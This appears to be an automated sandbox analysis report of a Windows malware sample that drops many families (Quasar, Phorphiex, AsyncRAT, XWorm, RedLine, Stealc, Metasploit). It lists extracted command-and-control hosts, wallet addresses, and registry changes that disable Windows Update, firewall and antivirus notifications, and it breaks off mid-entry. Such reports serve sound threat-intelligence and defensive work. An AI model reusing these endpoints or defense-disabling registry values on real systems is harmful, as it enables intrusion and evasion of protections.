Analysis
-
max time kernel
564s -
max time network
601s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-11-2024 12:18
Static task
static1
Behavioral task
behavioral1
Sample
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
Resource
win10v2004-20241007-en
General
-
Target
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.1
mae-ware
maeluadev-48337.portmap.io:48337
3ef823dd-91ea-4e28-9981-34ebf5ff5883
-
encryption_key
684009117DF150EF232A2EE8AE172085964C1CF0
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
Office
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
-
mutex
753f85d83d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
SolaraFake
anyone-blogging.gl.at.ply.gg:22284
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
Windows.exe
-
install_folder
%Temp%
Extracted
metasploit
windows/reverse_tcp
47.236.122.191:7900
Extracted
stealc
7140196255
http://83.217.209.11
-
url_path
/fd2453cf4b7dd4a4.php
Extracted
xworm
return-carol.gl.at.ply.gg:53275
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
redline
TG CLOUD @RLREBORN Admin @FATHEROFCARDERS
89.105.223.196:29862
Signatures
-
Asyncrat family
-
Detect Socks5Systemz Payload 1 IoCs
resource yara_rule behavioral2/memory/15748-13476-0x0000000000A10000-0x0000000000AB2000-memory.dmp family_socks5systemz -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0010000000023c05-13880.dat family_xworm behavioral2/memory/24140-13885-0x0000000000FA0000-0x0000000000FBA000-memory.dmp family_xworm -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe -
Njrat family
-
Phorphiex family
-
Phorphiex payload 4 IoCs
resource yara_rule behavioral2/files/0x000c000000023af6-30.dat family_phorphiex behavioral2/files/0x0010000000023af7-44.dat family_phorphiex behavioral2/files/0x000e000000023bc2-69.dat family_phorphiex behavioral2/files/0x0007000000023cd2-15187.dat family_phorphiex -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001e74e-16.dat family_quasar behavioral2/memory/4424-24-0x00000000006D0000-0x00000000009F4000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral2/memory/12960-15839-0x0000000000400000-0x0000000000452000-memory.dmp family_redline behavioral2/files/0x000c0000000226fe-15953.dat family_redline behavioral2/memory/13760-15958-0x00000000009C0000-0x00000000009FE000-memory.dmp family_redline -
Redline family
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Socks5systemz family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 18296 created 3532 18296 3402010102.exe 56 PID 18296 created 3532 18296 3402010102.exe 56 PID 18968 created 3532 18968 winupsecvmgr.exe 56 PID 18968 created 3532 18968 winupsecvmgr.exe 56 PID 18968 created 3532 18968 winupsecvmgr.exe 56 PID 37700 created 3532 37700 Earl.pif 56 -
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe -
Xmrig family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0008000000023c21-13281.dat family_asyncrat -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/memory/18968-13559-0x00007FF7C7E20000-0x00007FF7C83B7000-memory.dmp xmrig behavioral2/memory/19336-13579-0x00007FF7E66B0000-0x00007FF7E6E9F000-memory.dmp xmrig -
pid Process 19512 powershell.exe 18640 powershell.exe 19128 powershell.exe 39752 powershell.exe 2028 powershell.exe 19668 powershell.exe 15620 powershell.exe 4420 powershell.exe 1492 powershell.exe 6264 powershell.exe 6624 powershell.exe 9300 powershell.exe 9472 powershell.exe 12456 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 10172 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " meshagent32-group.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 99597542.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation sysppvrdnvs.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 816212898.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 52263531.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation VidsUsername.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation DivineDialogue.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation sysvplervcs.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Solara_Protect.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 531210104.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation sysppvrdnvs.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation ovrflw.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Ukodbcdcl.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation dayum.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation build_2024-07-25_20-56.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VibeStream.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\af0aa29f43924811e1101d2b844fbfd3.exe server.exe -
Executes dropped EXE 64 IoCs
pid Process 4068 npp.exe 4424 Office.exe 2356 pi.exe 4884 svchost.exe 4920 s.exe 3240 sysppvrdnvs.exe 5096 sysvplervcs.exe 3732 1548427715.exe 2940 sysnldcvmr.exe 4036 svchost.exe 3432 svchost.exe 316 Geek_se.exe 39608 utility-inst.exe 40568 utility-inst.tmp 40692 Solara_Protect.exe 8632 Windows.exe 8672 svchost.exe 9124 svchost.exe 4044 stories.exe 15436 stories.tmp 15748 shineencoder32.exe 15892 svchost.exe 16172 svchost.exe 16424 svchost.exe 16712 svchost.exe 17004 svchost.exe 17016 531210104.exe 17480 1142231072.exe 17572 99597542.exe 17776 svchost.exe 17876 816212898.exe 18156 1475019939.exe 18296 3402010102.exe 18312 1657131776.exe 18356 14548093.exe 18380 255224367.exe 18412 svchost.exe 18968 winupsecvmgr.exe 19044 390324013.exe 19096 1074232686.exe 19424 svchost.exe 19480 2126315482.exe 19648 3362324257.exe 19740 svchost.exe 20024 svchost.exe 20296 svchost.exe 20612 svchost.exe 20868 svchost.exe 21124 svchost.exe 21392 svchost.exe 21660 svchost.exe 21924 svchost.exe 22428 svchost.exe 540 svchost.exe 1440 svchost.exe 5132 svchost.exe 5428 svchost.exe 5708 svchost.exe 22184 svchost.exe 22688 1483322851.exe 22716 svchost.exe 22888 sysnldcvmr.exe 23172 svchost.exe 23452 svchost.exe -
Loads dropped DLL 61 IoCs
pid Process 40568 utility-inst.tmp 15436 stories.tmp 15748 shineencoder32.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 25436 dtl.exe 27788 curlapp64.exe 27788 curlapp64.exe 33096 foggy-mountains.exe 33096 foggy-mountains.exe 34948 printui.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 45.155.250.90 -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysvplervcs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe -
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" s.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" NoMoreRansom.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\curlapp64 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\curlapp64.exe" curlapp64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" tt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 1548427715.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nvaurnhq = "C:\\Users\\Admin\\AppData\\Roaming\\Nvaurnhq.exe" Ukodbcdcl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Reaper%20cfx%20Spoofer%20V2.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\af0aa29f43924811e1101d2b844fbfd3 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." server.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = 